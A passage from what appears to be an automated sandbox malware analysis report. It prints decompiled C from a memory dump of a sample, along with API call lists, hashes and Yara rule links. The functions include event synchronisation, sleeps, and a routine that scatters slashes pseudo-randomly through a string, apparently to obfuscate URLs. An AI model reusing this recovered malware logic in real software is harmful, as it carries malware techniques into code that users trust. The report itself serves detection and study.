					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x2bd9284);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x2bda348; // 0x9dd5a8
												_t28 = _t109 + 0x2bdb0e4; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x2bda348; // 0x9dd5a8
														_t33 = _t79 + 0x2bdb078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x02bd6ce4
0x02bd6ced
0x02bd6cee
0x02bd6cf2
0x02bd6cf8
0x02bd6cfe
0x02bd6d07
0x02bd6d0d
0x02bd6d17
0x02bd6d19
0x02bd6d1f
0x02bd6d24
0x02bd6d2f
0x02bd6d35
0x02bd6d3a
0x02bd6e5c
0x02bd6d40
0x02bd6d40
0x02bd6d4d
0x02bd6d53
0x02bd6d59
0x02bd6d5d
0x02bd6d63
0x02bd6d70
0x02bd6d74
0x02bd6d7a
0x02bd6d7d
0x02bd6d85
0x02bd6d86
0x02bd6d8a
0x02bd6d8e
0x02bd6d91
0x02bd6d94
0x02bd6d9a
0x02bd6da3
0x02bd6da9
0x02bd6daa
0x02bd6dad
0x02bd6dae
0x02bd6daf
0x02bd6db7
0x02bd6db8
0x02bd6db9
0x02bd6dbb
0x02bd6dbf
0x02bd6dc3
0x00000000
0x00000000
0x02bd6dc9
0x02bd6dd2
0x02bd6dd8
0x02bd6de2
0x02bd6de6
0x02bd6de8
0x02bd6df5
0x02bd6df9
0x02bd6e01
0x02bd6e06
0x02bd6e18
0x02bd6e1a
0x02bd6e20
0x02bd6e20
0x02bd6e29
0x02bd6e29
0x02bd6e2b
0x02bd6e31
0x02bd6e31
0x02bd6e34
0x02bd6e3a
0x02bd6e3d
0x02bd6e46
0x00000000
0x00000000
0x00000000
0x02bd6e46
0x02bd6d9a
0x02bd6d94
0x02bd6d7d
0x02bd6e4c
0x02bd6e4c
0x02bd6e52
0x02bd6e52
0x02bd6e58
0x02bd6e58
0x02bd6e61
0x02bd6e67
0x02bd6e67
0x02bd6d24
0x02bd6e70

APIs

SysAllocString.OLEAUT32(02BD9284), ref: 02BD6D2F
lstrcmpW.KERNEL32(00000000,0076006F), ref: 02BD6E10
SysFreeString.OLEAUT32(00000000), ref: 02BD6E29
SysFreeString.OLEAUT32(?), ref: 02BD6E58

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: ea43d92c5e39b76d3f5d2179cbb98ef88b87a204e4863b4a88800bad4a656a7a
Instruction ID: 2fbb995ce22e775d25a9662199435374fbe1e191a6f14530eae1b7bf97ece663
Opcode Fuzzy Hash: ea43d92c5e39b76d3f5d2179cbb98ef88b87a204e4863b4a88800bad4a656a7a
Instruction Fuzzy Hash: A1513F75D0050AEFCB01DFB8D4889EEB7BAFF88705B154594E915EB210E731AD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02BD597D Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 02BD59B8
SysFreeString.OLEAUT32(00000000), ref: 02BD5A9D

Part of subcall function 02BD6CDF: SysAllocString.OLEAUT32(02BD9284), ref: 02BD6D2F

SafeArrayDestroy.OLEAUT32(00000000), ref: 02BD5AF0
SysFreeString.OLEAUT32(00000000), ref: 02BD5AFF

Part of subcall function 02BD77E3: Sleep.KERNEL32(000001F4), ref: 02BD782B

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 0b3fd878d99276ba9297cddc758660a6cc5bdb539bf5756c8cf3c11b6b0a267c
Instruction ID: 92db5fbe79ebba41b4f2b454eb7056063d4396741d6afc6c70b7b26cf0d6dfe3
Opcode Fuzzy Hash: 0b3fd878d99276ba9297cddc758660a6cc5bdb539bf5756c8cf3c11b6b0a267c
Instruction Fuzzy Hash: 25519E35900609AFCB11CFA8C884ADEB7B6FF88744F558869E518DB210FB30ED49CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02BD4781 Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E02BD4781(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E02BD61EF(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E02BD6725(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E02BD7477(_t101,  &_v428, _a8, _t96 - _t81);
					E02BD7477(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E02BD6725(_t101, 0x2bda1d0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E02BD6725(_a16, _a4);
						E02BD7894(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L02BD82DA();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L02BD82D4();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E02BD5F09(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E02BD6E71(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E02BD10A0(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x2bda1d0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x02bd4784
0x02bd4790
0x02bd4796
0x02bd479b
0x02bd479f
0x02bd4911
0x02bd4915
0x02bd4915
0x02bd47a5
0x02bd47a9
0x02bd47ad
0x02bd47b0
0x02bd47bb
0x02bd47c1
0x02bd47c6
0x02bd47c9
0x02bd47e3
0x02bd47f2
0x02bd47fe
0x02bd4808
0x02bd480d
0x02bd480f
0x02bd4812
0x02bd48c9
0x02bd48cf
0x02bd48e0
0x02bd48f3
0x02bd4909
0x00000000
0x02bd490e
0x02bd481b
0x02bd4822
0x02bd4826
0x02bd482c
0x02bd482e
0x02bd4830
0x02bd4832
0x02bd4834
0x02bd483e
0x02bd4843
0x02bd4845
0x02bd4847
0x02bd4848
0x02bd4849
0x02bd484a
0x02bd4851
0x02bd4858
0x02bd485b
0x02bd485b
0x02bd4828
0x02bd4828
0x02bd4828
0x02bd4863
0x02bd486b
0x02bd4877
0x02bd487c
0x02bd487c
0x02bd4881
0x00000000
0x00000000
0x02bd4883
0x02bd4886
0x02bd4893
0x00000000
0x00000000
0x02bd4895
0x02bd4895
0x02bd48a2
0x02bd487c
0x02bd4881
0x00000000
0x00000000
0x00000000
0x02bd4881
0x02bd48ac
0x02bd48af
0x02bd48b2
0x02bd48b9
0x02bd48b9
0x02bd48c6
0x00000000
0x02bd48c6
0x02bd47b2
0x02bd47b6
0x02bd47b7
0x02bd47b9
0x00000000
0x00000000
0x00000000
0x02bd47b9
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 02BD4834
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 02BD484A
memset.NTDLL ref: 02BD48F3
memset.NTDLL ref: 02BD4909

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 78be993eb0487be1aa2a307478f4590b1a43cf50b4e988ac3a175177041df375
Instruction ID: 591e7562cea16f49d74be05ba4f67a2d50e34cfc9a4d03c213dc3141d05a5667
Opcode Fuzzy Hash: 78be993eb0487be1aa2a307478f4590b1a43cf50b4e988ac3a175177041df375
Instruction Fuzzy Hash: E841A071A00259AFDB109F68DC80BEE777AEF45350F0045A9F959A7280FB70AE54CF91

Uniqueness

Uniqueness Score: -1.00%

Function 02BD49D0 Relevance: 6.1, APIs: 4, Instructions: 96
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E02BD49D0(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x2bda310; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x2bda348; // 0x9dd5a8
				_t3 = _t8 + 0x2bdb7b4; // 0x61636f4c
				_t25 = 0;
				_t30 = E02BD74EC(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x2bda34c, 1, 0, _t30);
					E02BD61DA(_t30);
				}
				_t12 =  *0x2bda2fc; // 0x2000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E02BD30D5() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E02BD37DF(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x2bda124( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E02BD23C4(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}

0x02bd49d1
0x02bd49d8
0x02bd49e2
0x02bd49e6
0x02bd49ec
0x02bd49fb
0x02bd4a02
0x02bd4a06
0x02bd4a18
0x02bd4a1a
0x02bd4a1a
0x02bd4a1f
0x02bd4a26
0x02bd4a7d
0x02bd4a7d
0x02bd4a83
0x02bd4a85
0x02bd4a85
0x02bd4a8f
0x02bd4a93
0x02bd4aa5
0x02bd4aa5
0x02bd4aa9
0x02bd4aaf
0x02bd4aaf
0x00000000
0x02bd4a3f
0x02bd4a44
0x02bd4a4c
0x02bd4a50
0x02bd4a54
0x02bd4a54
0x02bd4a61
0x02bd4a65
0x02bd4a69
0x02bd4abe
0x02bd4ac4
0x02bd4ac4
0x02bd4a77
0x02bd4a7b
0x02bd4ab2
0x02bd4ab4
0x02bd4ab7
0x02bd4ab7
0x00000000
0x02bd4ab4
0x02bd4a7b
0x00000000
0x02bd4a65

APIs

Part of subcall function 02BD74EC: lstrlen.KERNEL32(00000005,00000000,43175AC3,00000027,00000000,035B9E40,00000000,?,?,43175AC3,00000005,02BDA00C,4D283A53,?,?), ref: 02BD7522
Part of subcall function 02BD74EC: lstrcpy.KERNEL32(00000000,00000000), ref: 02BD7546
Part of subcall function 02BD74EC: lstrcat.KERNEL32(00000000,00000000), ref: 02BD754E

CreateEventA.KERNEL32(02BDA34C,00000001,00000000,00000000,61636F4C,00000001,00000000,?,?,00000000,?,02BD6A95,?,?,?), ref: 02BD4A11

Part of subcall function 02BD61DA: RtlFreeHeap.NTDLL(00000000,00000000,02BD6383,00000000,?,00000000,00000000), ref: 02BD61E6

WaitForSingleObject.KERNEL32(00000000,00004E20,02BD6A95,00000000,00000000,?,00000000,?,02BD6A95,?,?,?), ref: 02BD4A71
WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,?,?,00000000,?,02BD6A95,?,?,?), ref: 02BD4A9F
CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,?,?,00000000,?,02BD6A95,?,?,?), ref: 02BD4AB7

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
String ID:
API String ID: 73268831-0
Opcode ID: 418efcfdda731d31b272f16207887050dbc7e9e1e44ef7555bcd91589d4d7dee
Instruction ID: cac9664d55d3f76223643309071e43f39f9665ea91bbb39f7e291a90aa37baec
Opcode Fuzzy Hash: 418efcfdda731d31b272f16207887050dbc7e9e1e44ef7555bcd91589d4d7dee
Instruction Fuzzy Hash: C9214932A417515BC7319A689C44BEB73FDEF48B28B0506A5FD65D7140FB70C8049B48

Uniqueness

Uniqueness Score: -1.00%

Function 02BD69E6 Relevance: 6.1, APIs: 4, Instructions: 87
sleepCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E02BD69E6(void* __ecx, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E02BD2A3D(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E02BD28B3(_t23);
						}
					}
					return _t38;
				}
				if(E02BD6ADC(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x2bda34c, 1, 0,  *0x2bda3e4);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E02BD5704(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E02BD4C94(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E02BD7220(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E02BD49D0( &_v32, _t39);
					goto L13;
				}
			}

0x02bd69e6
0x02bd69f3
0x02bd69f9
0x02bd69fa
0x02bd69fb
0x02bd69fc
0x02bd69fd
0x02bd6a01
0x02bd6a0d
0x02bd6a11
0x02bd6a99
0x02bd6a99
0x02bd6a9c
0x02bd6a9e
0x02bd6aa6
0x02bd6aac
0x02bd6aaf
0x02bd6aaf
0x02bd6aac
0x02bd6aba
0x02bd6aba
0x02bd6a24
0x02bd6a26
0x02bd6a26
0x02bd6a3d
0x02bd6a41
0x02bd6a44
0x02bd6a4f
0x02bd6a56
0x02bd6a56
0x02bd6a5f
0x02bd6a63
0x02bd6a71
0x02bd6a65
0x02bd6a65
0x02bd6a66
0x02bd6a67
0x02bd6a68
0x02bd6a69
0x02bd6a6a
0x02bd6a6a
0x02bd6a76
0x02bd6a79
0x02bd6a7d
0x02bd6a7f
0x02bd6a7f
0x02bd6a86
0x00000000
0x02bd6a88
0x02bd6a88
0x02bd6a95
0x00000000
0x02bd6a95

APIs

CreateEventA.KERNEL32(02BDA34C,00000001,00000000,00000040,?,?,7476F710,00000000,7476F730), ref: 02BD6A37
SetEvent.KERNEL32(00000000), ref: 02BD6A44
Sleep.KERNEL32(00000BB8), ref: 02BD6A4F
CloseHandle.KERNEL32(00000000), ref: 02BD6A56

Part of subcall function 02BD5704: WaitForSingleObject.KERNEL32(00000000,?,?,?,02BD6A76,?,02BD6A76,?,?,?,?,?,02BD6A76,?), ref: 02BD57DE

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: Event$CloseCreateHandleObjectSingleSleepWait
String ID:
API String ID: 2559942907-0
Opcode ID: 30abd0f1fc6273d3cf6124522d0f90cf23b2c24a74e785c26ab3b0dbdb6ce6e5
Instruction ID: 0f52db32c0656a85ce123e68ddb7c680fe3652c513417b7ee21e590e79832a42
Opcode Fuzzy Hash: 30abd0f1fc6273d3cf6124522d0f90cf23b2c24a74e785c26ab3b0dbdb6ce6e5
Instruction Fuzzy Hash: 9721C973D0011AAFCF20AFE4E4849DE77BDEF04354B4584A5EA61E7100F7359985CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02BD4461 Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E02BD4461(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0;
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E02BD33DC(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x02bd446d
0x02bd4471
0x02bd4472
0x02bd4473
0x02bd4475
0x02bd4477
0x02bd447a
0x02bd447f
0x02bd4516
0x02bd451d
0x02bd451d
0x02bd4488
0x02bd448f
0x02bd449f
0x02bd449f
0x02bd44a5
0x02bd44a7
0x02bd44ac
0x02bd44b5
0x02bd44bb
0x02bd44c0
0x02bd44cb
0x02bd44cf
0x02bd44d1
0x02bd44d2
0x02bd44db
0x02bd44df
0x02bd44f0
0x02bd44e1
0x02bd44e6
0x02bd44eb
0x02bd44fa
0x02bd44fa
0x02bd44cf
0x02bd4500
0x02bd4506
0x02bd4506
0x02bd450f
0x02bd4514
0x02bd4514
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 02BD448F
lstrlenW.KERNEL32(?), ref: 02BD44C5
memcpy.NTDLL(00000000,?,?,?), ref: 02BD44E6
SysFreeString.OLEAUT32(?), ref: 02BD44FA

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: efb2fde64e1fbbb29cb98316b02c987108799d30a6f8bcc4dd85e2360503b8b6
Instruction ID: 2ab22c59bc99252956c7937a0d15de6d6dc8270eabb9a78123c2d549940fb1e3
Opcode Fuzzy Hash: efb2fde64e1fbbb29cb98316b02c987108799d30a6f8bcc4dd85e2360503b8b6
Instruction Fuzzy Hash: AC214F75901209EFCB11DFA8D9949DEBBB9FF49358B1481A9E905E7200FB30EA41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 02BD2708 Relevance: 6.1, APIs: 4, Instructions: 61
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02BD2708(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x2bda2d8, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x2bda2f0; // 0xdd708feb
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x2bda2f0 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

0x02bd2710
0x02bd2713
0x02bd2719
0x02bd2731
0x02bd2733
0x02bd2738
0x02bd273a
0x02bd273d
0x02bd273f
0x02bd2742
0x02bd2744
0x02bd2744
0x02bd2746
0x02bd2751
0x02bd2756
0x02bd2767
0x02bd276f
0x02bd2774
0x02bd2777
0x02bd277a
0x02bd277c
0x02bd277f
0x02bd2782
0x02bd2782
0x02bd2785
0x02bd2790
0x02bd2795
0x02bd279f

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02BD6708,00000000,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD2713
RtlAllocateHeap.NTDLL(00000000,?), ref: 02BD272B
memcpy.NTDLL(00000000,035B9600,-00000008,?,?,?,02BD6708,00000000,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD276F
memcpy.NTDLL(00000001,035B9600,00000001,02BD3ECE,00000000,035B9600), ref: 02BD2790

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: eaf27848541ea756ce03ed7c61785dff449b4abf4040d161f102095ea44ad664
Instruction ID: b6f7d38f7759ad7db7df44187bebf71d179e9cb9bb1a5c001b369c40f6e7a71c
Opcode Fuzzy Hash: eaf27848541ea756ce03ed7c61785dff449b4abf4040d161f102095ea44ad664
Instruction Fuzzy Hash: 4A1129B2E01215AFD7208F6ADC84EDE7BEEEB803A0B1401B6F808D7140F7719E1487A0

Uniqueness

Uniqueness Score: -1.00%

Function 02BD23C4 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 48
COMMON

